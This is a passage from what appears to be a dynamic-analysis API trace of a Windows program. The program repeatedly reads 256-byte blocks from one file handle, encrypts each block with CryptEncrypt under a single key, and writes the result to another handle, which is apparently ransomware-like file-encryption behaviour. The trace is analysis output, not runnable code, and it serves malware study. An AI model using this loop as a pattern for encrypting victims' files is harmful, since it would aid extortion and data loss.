hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.514] GetLastError () returned 0x0 [0167.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.514] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.514] GetLastError () returned 0x0 [0167.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.515] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.515] GetLastError () returned 0x0 [0167.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.515] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.515] GetLastError () returned 0x0 [0167.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.515] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.515] GetLastError () returned 0x0 [0167.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.515] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.515] GetLastError () returned 0x0 [0167.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.515] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.515] GetLastError () returned 0x0 [0167.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.515] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.515] GetLastError () returned 0x0 [0167.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.515] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.515] GetLastError () returned 0x0 [0167.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.516] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.516] GetLastError () returned 0x0 [0167.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.516] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.516] GetLastError () returned 0x0 [0167.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.516] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.516] GetLastError () returned 0x0 [0167.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.516] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.516] GetLastError () returned 0x0 [0167.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.516] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.516] GetLastError () returned 0x0 [0167.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.516] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.516] GetLastError () returned 0x0 [0167.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.517] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.517] GetLastError () returned 0x0 [0167.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.517] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.517] GetLastError () returned 0x0 [0167.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.517] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.517] GetLastError () returned 0x0 [0167.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.517] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.517] GetLastError () returned 0x0 [0167.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.517] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.517] GetLastError () returned 0x0 [0167.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.517] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.517] GetLastError () returned 0x0 [0167.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.517] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.517] GetLastError () returned 0x0 [0167.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.518] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.518] GetLastError () returned 0x0 [0167.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.518] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.518] GetLastError () returned 0x0 [0167.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.518] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.518] GetLastError () returned 0x0 [0167.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.518] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.518] GetLastError () returned 0x0 [0167.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.518] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.518] GetLastError () returned 0x0 [0167.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.518] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.518] GetLastError () returned 0x0 [0167.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.519] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.519] GetLastError () returned 0x0 [0167.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.519] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.519] GetLastError () returned 0x0 [0167.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.519] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.519] GetLastError () returned 0x0 [0167.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.519] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.519] GetLastError () returned 0x0 [0167.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.519] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: 